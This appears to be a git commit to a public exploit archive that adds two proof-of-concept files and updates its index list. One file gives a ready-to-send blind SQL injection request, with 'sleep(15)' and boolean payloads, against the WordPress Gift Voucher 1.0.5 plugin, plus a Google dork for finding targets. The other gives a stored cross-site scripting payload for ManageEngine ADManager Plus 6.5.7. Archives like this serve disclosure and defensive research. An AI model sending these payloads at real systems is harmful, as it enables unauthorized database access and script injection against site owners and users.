DB: 2018-08-27

2 changes to exploits/shellcodes Apache James 2.2 - SMTP Denial of Service Apache James Server 2.2 - SMTP Denial of Service SSH2 3.0 - Restricted Shell Escaping Command Execution SSH2 3.0 - Restricted Shell Escape (Command Execution) WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
2018-08-27 05:01:54 +00:00 · 2018-08-27 05:01:54 +00:00 · aaa959b29c
commit aaa959b29c
parent ec10fd3afb
3 changed files with 92 additions and 2 deletions
--- a/exploits/php/webapps/45255.txt
+++ b/exploits/php/webapps/45255.txt
@ -0,0 +1,38 @@
 # Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
 # Google Dork: intext:"/wp-content/plugins/gift-voucher/"
 # Date: 2018-08-23
 # Exploit Author: Renos Nikolaou
 # Software Link: https://wordpress.org/plugins/gift-voucher/
 # Vendor Homepage: http://www.codemenschen.at/
 # Version: 1.0.5
 # Tested on: Windows 10
 # CVE: N/A
 # Description : The vulnerability allows an attacker to inject sql commands 
 # on 'template_id' parameter.
 # PoC - Blind SQLi :
 POST /wp-admin/admin-ajax.php HTTP/1.1
 Host: domain.com
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://domain.com/gift-voucher/
 Content-Length: 62
 Cookie: PHPSESSID=efa4of1gq42g0nd9nmj8dska50; __stripe_mid=1f8c5bef-b440-4803-bdd5-f0d0ea22007e; __stripe_sid=de547b6b-fa31-46a1-972b-7b3324272a23
 Connection: close
 action=wpgv_doajax_front_template&template_id=1 and sleep(15)#
 Parameter: template_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=wpgv_doajax_front_template&template_id=1 AND 4448=4448
    Vector: AND [INFERENCE]
 ---
 web application technology: Apache
 back-end DBMS: MySQL >= 5.0.0
 banner:    '5.5.59'
--- a/exploits/windows_x86-64/webapps/45256.txt
+++ b/exploits/windows_x86-64/webapps/45256.txt
@ -0,0 +1,50 @@
 # Exploit Title: ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
 # Date: 2018-08-21 
 # Exploit Author: Ismail Tasdelen
 # Vendor Homepage: https://www.manageengine.com/
 # Hardware Link : https://www.manageengine.com/products/ad-manager/
 # Software : ZOHO Corp ManageEngine ADManager Plus
 # Product Version:  6.5.7
 # Vulernability Type : Cross-site Scripting
 # Vulenrability : Stored XSS
 # CVE : N/A
 # Zoho ManageEngine ADManager Plus 6.5.7 allows XSS on the "Workflow Delegation" "Requesters" screen.
 # HTTP Request Header :
 Request URL: http://TARGET:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows
 Request Method: POST
 Status Code: 200 OK
 Remote Address: TARGET:8080
 Referrer Policy: no-referrer-when-downgrade
 Accept: */*
 Accept-Encoding: gzip, deflate
 Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: keep-alive
 Content-Length: 320
 Content-type: application/x-www-form-urlencoded;charset=UTF-8
 Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=3CED862790101335DD0EB05EE42E4972; JSESSIONIDSSO=3E6785DB8D6DFD46D6C729579E68418D
 Host: TARGET:8080
 Origin: http://TARGET:8080
 Referer: http://TARGET:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
 X-Requested-With: XMLHttpRequest
 # HTTP Response Header :
 Content-Length: 3753
 Content-Type: text/html;charset=UTF-8
 Date: Tue, 14 Aug 2018 10:14:32 GMT
 Server: Apache-Coyote/1.1
 X-Content-Type-Options: nosniff
 X-XSS-Protection: 1
 # Query String Parameters :
 methodToCall: listTechnicianRows
 # Form Data :
 params: {"startIndex":1,"range":10,"searchText":"\"><img src=x onerror=alert('TESTER')>","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}
 adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3569,7 +3569,7 @@ id,file,description,date,author,type,platform,port
 27903,exploits/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,dos,linux,
 27906,exploits/windows/dos/27906.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",dos,windows,
 27914,exploits/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - IMAP Remote Buffer Overflow",2006-05-29,kcope,dos,windows,
-27915,exploits/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple,
+27915,exploits/multiple/dos/27915.pl,"Apache James Server 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple,
 27925,exploits/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",dos,linux,
 27930,exploits/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow (PoC)",2006-05-31,Mr.Niega,dos,windows,
 27942,exploits/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",dos,hardware,
@ -8286,7 +8286,7 @@ id,file,description,date,author,type,platform,port
 21362,exploits/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",local,linux,
 21373,exploits/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Command Injection",2002-04-11,"Przemyslaw Frasunek",local,openbsd,
 21375,exploits/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",local,linux,
-21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,local,linux,
+21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escape (Command Execution)",2002-04-18,A.Dimitrov,local,linux,
 21407,exploits/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,local,bsd,
 21408,exploits/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,local,unix,
 21414,exploits/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Local Buffer Overflow",2002-04-23,"Gobbles Security",local,unix,
@ -39856,3 +39856,5 @@ id,file,description,date,author,type,platform,port
 45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware,
 45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php,
 45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,
 45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,
 45256,exploits/windows_x86-64/webapps/45256.txt,"ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting",2018-08-26,"Ismail Tasdelen",webapps,windows_x86-64,